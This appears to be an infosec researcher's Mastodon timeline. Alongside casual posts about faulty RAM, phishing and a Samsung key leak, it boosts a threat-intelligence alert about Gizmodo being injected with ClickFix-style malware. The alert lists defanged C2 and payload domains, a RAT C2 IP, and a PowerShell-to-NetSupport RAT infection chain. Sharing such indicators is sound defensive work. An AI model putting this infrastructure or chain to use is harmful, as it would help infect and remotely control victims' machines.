Turns out, the 64GB of RAM I bought last summer for a home lab expansion I'm only getting to now is bad. Both sticks. Cool, cool cool.
Rob O 
- 1,057 Followers
- 408 Following
- 11 Posts
Teaching faculty. Security researcher. Red team, DevOps, AppSec. An academic but not an academic. nerdprof @ Twitter
Wendy NatherWaiting for the first person to sue their employer for cognitive damage due to forced AI use. 🤔
@Sempf @GossiTheDog Recency bias?
Does anyone happen to have any good resources for how much malware is hosted behind CloudFlare? I know the answer is a lot, but I've not actual stats.
@Viss I'm pretty sure we all have a phishing story like this. Mine didn't involve another company, but I do think we made everyone we sent the email to think they were in hot water with HR. Good judgement is often the result of exercising bad judgement (which does not justify the bad judgement).
Tommy M (TheAnalyst)RE: https://infosec.exchange/@briankrebs/116780029181293028
Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.
TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷
Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.
abadideaum, what’s that part where samsung *agrees* they’ve known about the key leak since, uh, 2016?? https://arstechnica.com/gadgets/2022/12/samsungs-android-app-signing-key-has-leaked-is-being-used-to-sign-malware/
